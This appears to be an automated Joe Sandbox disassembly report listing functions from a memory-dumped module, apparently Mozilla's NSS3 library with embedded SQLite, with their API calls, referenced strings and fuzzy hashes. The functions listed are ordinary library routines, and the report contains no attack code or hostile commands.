Instruction Fuzzy Hash: 9822C0B1A04300AFE700CF14CE49B9A77E1AF8431CF24857CE8585B792E772E959CB96

Function 6C68ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C68ED38

Part of subcall function 6C624F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C624FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C68EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C68EFE4

Part of subcall function 6C74DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C625001,?,00000003,00000000), ref: 6C74DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C68F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C68F129
sqlite3_mprintf.NSS3(optimize), ref: 6C68F1D1
sqlite3_free.NSS3(?), ref: 6C68F368

Strings

fts4aux, xrefs: 6C68ECF9
unicode61, xrefs: 6C68EDB5
snippet, xrefs: 6C68EF05, 6C68EF37, 6C68EF7C
optimize, xrefs: 6C68F199, 6C68F1CC, 6C68F211
fts3_tokenizer, xrefs: 6C68EE1A, 6C68EEA8
simple, xrefs: 6C68ED79
fts3, xrefs: 6C68F247
porter, xrefs: 6C68ED97
fts4, xrefs: 6C68F2AD
matchinfo, xrefs: 6C68F04F, 6C68F082, 6C68F0C2, 6C68F0F2, 6C68F124, 6C68F169
offsets, xrefs: 6C68EFAF, 6C68EFDF, 6C68F01F
fts3tokenize, xrefs: 6C68F30F

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: 8ddc8a07e6f761df4653153d9eac2b7c92129dd3c898e833b2d59faf4ae9c2b8
Instruction ID: f6e7b09a54fdac56e9e0a6de78b680bf5aa6711903015e379686e9734807995a
Opcode Fuzzy Hash: 8ddc8a07e6f761df4653153d9eac2b7c92129dd3c898e833b2d59faf4ae9c2b8
Instruction Fuzzy Hash: A102F1B2B053014BE7049E31A88572B37B27BD570CF24453CD95A97B01EB75E84687EB

Function 6C71C8C0 Relevance: 25.9, APIs: 17, Instructions: 432COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C71CA51
TlsGetValue.KERNEL32 ref: 6C71CAE8
EnterCriticalSection.KERNEL32(?), ref: 6C71CAFC
PK11_FreeSymKey.NSS3(00000000), ref: 6C71CB2E
PK11_KeyGen.NSS3(?,?,00000000,00000000,?), ref: 6C71CB87
memset.VCRUNTIME140(?,00000000,00000410), ref: 6C71CBA8
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C71CCCD
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C71CCE1
PK11_PubDeriveWithKDF.NSS3 ref: 6C71CD3D
memcpy.VCRUNTIME140(?,?,?), ref: 6C71CD73
memcpy.VCRUNTIME140(?,?,?), ref: 6C71CD9D
PK11_WrapSymKey.NSS3(?,00000000,?,00000000,?), ref: 6C71CDDA
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C71CE04
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C71CE17
PK11_FreeSymKey.NSS3(00000000), ref: 6C71CE24
PR_Unlock.NSS3 ref: 6C71CE49
PK11_FreeSymKey.NSS3(00000000), ref: 6C71CE96

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: K11_$ErrorFree$Destroymemcpy$CriticalDeriveEnterPrivatePublicSectionUnlockValueWithWrapmemset
String ID:
API String ID: 3685077037-0
Opcode ID: 4f2f0b73b3ac60422d670c98b8a7e0e25f77ef22e2738193b29f92f372eac6bb
Instruction ID: e7a9a9b4a7baea9956c43d89ad45642e8ad038703761f0838095872627aadd45
Opcode Fuzzy Hash: 4f2f0b73b3ac60422d670c98b8a7e0e25f77ef22e2738193b29f92f372eac6bb
Instruction Fuzzy Hash: 02F1E5B1D082148BEB11EE94CE8179A77B8FF4530AF1C40B9D909A7F41E734DA94CB96

Function 6C69EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C69EF63

Part of subcall function 6C6A87D0: PORT_NewArena_Util.NSS3(00000800,6C69EF74,00000000), ref: 6C6A87E8
Part of subcall function 6C6A87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C69EF74,00000000), ref: 6C6A87FD
Part of subcall function 6C6A87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C6A884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C69F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C69F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C69F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C69F374
PL_strcasecmp.NSS3(6C7E2FD4,?), ref: 6C69F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C69F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C69F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C69F67D
CERT_DestroyName.NSS3(?), ref: 6C69F68B

Part of subcall function 6C6A8320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C6A8338
Part of subcall function 6C6A8320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C6A8364
Part of subcall function 6C6A8320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C6A838E
Part of subcall function 6C6A8320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6A83A5
Part of subcall function 6C6A8320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A83E3

Part of subcall function 6C6A84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C6A84D9
Part of subcall function 6C6A84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C6A8528

Part of subcall function 6C6A8900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C69F599,?,00000000), ref: 6C6A8955

Strings

*, xrefs: 6C69F3C6
", xrefs: 6C69F21B
oid., xrefs: 6C69F2CF

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: d61fcba1c11d9bd443a5bce05946a6937dd804f8f25114d561087e2379bce41e
Instruction ID: 5747ea3f19cbabfdeae26d9ba4970d1f088d814d7e549d9008e6ebcad400a180
Opcode Fuzzy Hash: d61fcba1c11d9bd443a5bce05946a6937dd804f8f25114d561087e2379bce41e
Instruction Fuzzy Hash: 0F22387160C3428FD714CE68C4903AAB7E6AB9531CF1A4A2EF495C7B91E7319C45C78B

Function 6C70EFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C70C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C70DAE2,?), ref: 6C70C6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C70F0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C70F0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C70F101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C70F11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C7D218C), ref: 6C70F183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C70F19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C70F1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C70F1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C70F210

Part of subcall function 6C6B52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C70F1E9,?,00000000,?,?), ref: 6C6B52F5
Part of subcall function 6C6B52D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C6B530F
Part of subcall function 6C6B52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C6B5326
Part of subcall function 6C6B52D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C70F1E9,?,00000000,?,?), ref: 6C6B5340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C70F227

Part of subcall function 6C6FFAB0: free.MOZGLUE(?,-00000001,?,?,6C69F673,00000000,00000000), ref: 6C6FFAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C70F23E

Part of subcall function 6C6FBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C6AE708,00000000,00000000,00000004,00000000), ref: 6C6FBE6A
Part of subcall function 6C6FBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C6B04DC,?), ref: 6C6FBE7E
Part of subcall function 6C6FBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C6FBEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C70F2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C70F3A8

Part of subcall function 6C74C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C74C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C70F3B3

Part of subcall function 6C6B2D20: PK11_DestroyObject.NSS3(?,?), ref: 6C6B2D3C
Part of subcall function 6C6B2D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C6B2D5F

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 89e1d8bc02db7ba0a3e7c59a51c71e7c9e6beb970faa45961bbfd10c24594894
Instruction ID: c4dd24ad468774079e8f8b165dbc87d5942230c1a04ce9e0f0d9ec62fca8eabb
Opcode Fuzzy Hash: 89e1d8bc02db7ba0a3e7c59a51c71e7c9e6beb970faa45961bbfd10c24594894
Instruction Fuzzy Hash: FFD17EB6F012059FDB14CFA9DA80A9EB7F5EF48318F198039D915A7711EB31E806CB58

Function 6C62ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C62ED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C62EE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C62EF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C62EF98

Strings

database corruption, xrefs: 6C62F48D
%s at line %d of [%.10s], xrefs: 6C62F492
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C62F483

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: 7d12b5a84f511d51993d9e6fc6883a798946d9cedc61e4c0186e783efb82ec84
Instruction ID: 33da699559339405c6b73eabef1e1e1269281c2b10e8ef69afbe6434d9e2f8de
Opcode Fuzzy Hash: 7d12b5a84f511d51993d9e6fc6883a798946d9cedc61e4c0186e783efb82ec84
Instruction Fuzzy Hash: 3A622330A042158FEB14CF64C484B9ABBF1BF45318F1845ADD8456BB92D739E886CFDA

Function 6C63AEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C75CF46,?,6C62CDBD,?,6C75BF31,?,?,?,?,?,?,?), ref: 6C63B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C75CF46,?,6C62CDBD,?,6C75BF31), ref: 6C63B090
sqlite3_free.NSS3(?,?,?,?,?,?,6C75CF46,?,6C62CDBD,?,6C75BF31), ref: 6C63B0A2
CloseHandle.KERNEL32(?,?,6C75CF46,?,6C62CDBD,?,6C75BF31,?,?,?,?,?,?,?,?,?), ref: 6C63B100
sqlite3_free.NSS3(?,?,00000002,?,6C75CF46,?,6C62CDBD,?,6C75BF31,?,?,?,?,?,?,?), ref: 6C63B115
sqlite3_free.NSS3(?,?,?,?,?,?,6C75CF46,?,6C62CDBD,?,6C75BF31), ref: 6C63B12D

Part of subcall function 6C629EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C63C6FD,?,?,?,?,6C68F965,00000000), ref: 6C629F0E
Part of subcall function 6C629EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C68F965,00000000), ref: 6C629F5D

Strings

`{l, xrefs: 6C63B0DF

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID: `{l
API String ID: 3155957115-334118966
Opcode ID: e2a73d9a67b73de65190493053ec71ec9c3098052f6d65ab83d631649ba34323
Instruction ID: b56100995c6033bc27a8c8a8de79f9bd19fb3c854c51296cfb03949d1852cfd6
Opcode Fuzzy Hash: e2a73d9a67b73de65190493053ec71ec9c3098052f6d65ab83d631649ba34323
Instruction Fuzzy Hash: 5F9100B0A006158FDB14CF64DC84BABB7B1FF86308F14663DE45A97A51EB34E844CB99

Function 6C6D0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C6D0F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C6D0FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C6D1006
PK11_FreeSymKey.NSS3(?), ref: 6C6D101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6D1033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6D103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C6D1048
memcpy.VCRUNTIME140(?,?,?), ref: 6C6D108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C6D10BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C6D10D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C6D112E

Part of subcall function 6C6D1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C6D08C4,?,?), ref: 6C6D15B8
Part of subcall function 6C6D1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C6D08C4,?,?), ref: 6C6D15C1
Part of subcall function 6C6D1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6D162E
Part of subcall function 6C6D1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6D1637

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 9e862fc2020b12f80cc74d2042aaad96e14ad3a1f5cb31bfeac90676b9640790
Instruction ID: 323a90e8e89aff0985e7a717b0aad2b382f6f4c776949aa5cfdd57f594570a07
Opcode Fuzzy Hash: 9e862fc2020b12f80cc74d2042aaad96e14ad3a1f5cb31bfeac90676b9640790
Instruction Fuzzy Hash: CE71F4B1E042058FDB00CFA5CC84AAAB7F5FF48328F15862DE91997711EBB1E954CB85

Function 6C6F6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C6A1C6F,00000000,00000004,?,?), ref: 6C6F6C3F

Part of subcall function 6C74C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C74C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C6A1C6F,00000000,00000004,?,?), ref: 6C6F6C60
PR_ExplodeTime.NSS3(00000000,6C6A1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C6A1C6F,00000000,00000004,?,?), ref: 6C6F6C94

Strings

gfff, xrefs: 6C6F6D9C
gfff, xrefs: 6C6F6D30
gfff, xrefs: 6C6F6CF5
gfff, xrefs: 6C6F6CFD
gfff, xrefs: 6C6F6D66

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: ca36dc48262c04912585eaceec910980213938ebd25d9d8f6d6addae3f45883a
Instruction ID: 2a47d80ad52f8b33a9321f19dc5b32a4d921c970c56754c6a206a0ef52df63b4
Opcode Fuzzy Hash: ca36dc48262c04912585eaceec910980213938ebd25d9d8f6d6addae3f45883a
Instruction Fuzzy Hash: 9D513B72B016494FC708CDADDC626DABBDAABA4310F48C23AE842DB785D678D906C751

Function 6C770F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C771027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7710B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C771353

Strings

$, xrefs: 6C7712A0
%02x, xrefs: 6C7712F6
-- , xrefs: 6C770FF5
'%.*q', xrefs: 6C771217, 6C771292
zeroblob(%d), xrefs: 6C771223
NULL, xrefs: 6C77119E
%lld, xrefs: 6C77114B

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: 1621df3ae9f99974c190fb105bcc8c7d80e20f2f24b45b24f867814242c18fb3
Instruction ID: 03b7b64823cfad4e90c1d6e5af82bdbf38774f7b47c05324ab10d232aa3e84d2
Opcode Fuzzy Hash: 1621df3ae9f99974c190fb105bcc8c7d80e20f2f24b45b24f867814242c18fb3
Instruction Fuzzy Hash: 45E1C4716083449FDB20CF18C590A6BBBF1BF86348F14892DF9998BB51D771E845CB62

Function 6C7B8D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C8014E4,6C76CC70), ref: 6C7B8D47
PR_GetCurrentThread.NSS3 ref: 6C7B8D98

Part of subcall function 6C690F00: PR_GetPageSize.NSS3(6C690936,FFFFE8AE,?,6C6216B7,00000000,?,6C690936,00000000,?,6C62204A), ref: 6C690F1B
Part of subcall function 6C690F00: PR_NewLogModule.NSS3(clock,6C690936,FFFFE8AE,?,6C6216B7,00000000,?,6C690936,00000000,?,6C62204A), ref: 6C690F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C7B8E7B
htons.WSOCK32(?), ref: 6C7B8EDB
PR_GetCurrentThread.NSS3 ref: 6C7B8F99
PR_GetCurrentThread.NSS3 ref: 6C7B910A

Strings

%u.%u.%u.%u, xrefs: 6C7B8E74

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: decd12daa4e42fb598840af6c9dc0078e2ebf5a79531e8dd5081ab62dd30ee0c
Instruction ID: f862edcf27989b2f2586bb6e58788222c187591e2137cc00251bc93c80c5e78c
Opcode Fuzzy Hash: decd12daa4e42fb598840af6c9dc0078e2ebf5a79531e8dd5081ab62dd30ee0c
Instruction Fuzzy Hash: 5A02EE319062568FDB14CF19C5583A6BBB3EF62344F2AC26ED8A56FB92C331D905C790

Function 6C7368E0 Relevance: 12.2, APIs: 8, Instructions: 241COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 6C7368FC
PR_EnterMonitor.NSS3 ref: 6C736924

Part of subcall function 6C769090: TlsGetValue.KERNEL32 ref: 6C7690AB
Part of subcall function 6C769090: TlsGetValue.KERNEL32 ref: 6C7690C9
Part of subcall function 6C769090: EnterCriticalSection.KERNEL32 ref: 6C7690E5
Part of subcall function 6C769090: TlsGetValue.KERNEL32 ref: 6C769116
Part of subcall function 6C769090: LeaveCriticalSection.KERNEL32 ref: 6C76913F

Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907AD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907CD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907D6
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C62204A), ref: 6C6907E4
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,6C62204A), ref: 6C690864
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C690880
